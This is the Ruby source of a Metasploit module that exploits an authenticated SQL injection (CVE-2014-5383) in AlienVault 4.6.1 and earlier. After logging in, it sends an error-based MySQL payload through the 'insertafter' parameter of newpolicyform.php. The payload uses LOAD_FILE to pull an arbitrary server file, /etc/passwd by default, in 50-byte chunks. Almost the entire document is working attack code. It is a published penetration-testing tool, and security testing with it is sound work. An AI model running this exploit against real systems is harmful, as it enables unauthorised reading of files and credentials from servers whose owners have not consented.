Path: blob/master/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb
19670 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient78def initialize(info = {})9super(10update_info(11info,12'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",13'Description' => %q{14AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against15newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability16to read an arbitrary file from the file system. Any authenticated user is able to exploit17this, as administrator privileges are not required.18},19'License' => MSF_LICENSE,20'Author' => [21'Chris Hebert <chrisdhebert[at]gmail.com>'22],23'References' => [24['CVE', '2014-5383'],25['OSVDB', '106815'],26['EDB', '33317'],27['URL', 'http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower']28],29'DefaultOptions' => {30'SSL' => true31},32'Privileged' => false,33'DisclosureDate' => '2014-05-09',34'Notes' => {35'Reliability' => UNKNOWN_RELIABILITY,36'Stability' => UNKNOWN_STABILITY,37'SideEffects' => UNKNOWN_SIDE_EFFECTS38}39)40)4142register_options([43Opt::RPORT(443),44OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),45OptString.new('USERNAME', [ true, 'Single username' ]),46OptString.new('PASSWORD', [ true, 'Single password' ]),47OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ]),48OptInt.new('SQLI_TIMEOUT', [ true, 'Specify the maximum time to exploit the sqli (in seconds)', 60])49])50end5152def run53print_status("Get a valid session cookie...")54res = send_request_cgi({55'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')56})5758unless res && res.code == 20059print_error("Server did not respond in an expected way")60return61end6263cookie = res.get_cookies6465if cookie.blank?66print_error("Could not retrieve a cookie")67return68end6970post = {71'embed' => '',72'bookmark_string' => '',73'user' => datastore['USERNAME'],74'passu' => datastore['PASSWORD'],75'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])76}7778print_status("Login...")7980res = send_request_cgi({81'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),82'method' => 'POST',83'vars_post' => post,84'cookie' => cookie85})8687unless res && res.code == 30288print_error("Server did not respond in an expected way")89return90end9192unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/')93print_error("Authentication failed")94return95end9697cookie = res.get_cookies9899if cookie.blank?100print_error("Could not retrieve the authenticated cookie")101return102end103104i = 0105full = ''106filename = datastore['FILEPATH'].unpack("H*")[0]107left_marker = Rex::Text.rand_text_alpha(6)108right_marker = Rex::Text.rand_text_alpha(6)109sql_true = Rex::Text.rand_text_alpha(6)110111print_status("Exploiting SQLi...")112113begin114::Timeout.timeout(datastore['SQLI_TIMEOUT']) do115loop do116file = sqli(left_marker, right_marker, sql_true, i, cookie, filename)117return if file.nil?118break if file.empty?119120str = [file].pack("H*")121full << str122vprint_status(str)123124i = i + 1125end126end127rescue ::Timeout::Error128if full.blank?129print_error("Timeout while exploiting sqli, nothing recovered")130else131print_error("Timeout while exploiting sqli, #{full.length} bytes recovered")132end133return134end135136path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])137print_good("File stored at path: " + path)138end139140def sqli(left_marker, right_marker, sql_true, i, cookie, filename)141pay = "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"142pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"143pay << "0x20)),#{(50 * i) + 1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"144pay << " GROUP BY x)a) AND ('0x#{sql_true.unpack("H*")[0]}'='0x#{sql_true.unpack("H*")[0]}"145146get = {147'insertafter' => pay,148'ctx' => 0149}150151res = send_request_cgi({152'uri' => normalize_uri(target_uri.path, 'ossim', 'policy', 'newpolicyform.php'),153'cookie' => cookie,154'vars_get' => get155})156157if res && res.body && res.body =~ /#{left_marker}(.*)#{right_marker}/158return $1159else160print_error("Server did not respond in an expected way")161return nil162end163end164end165166167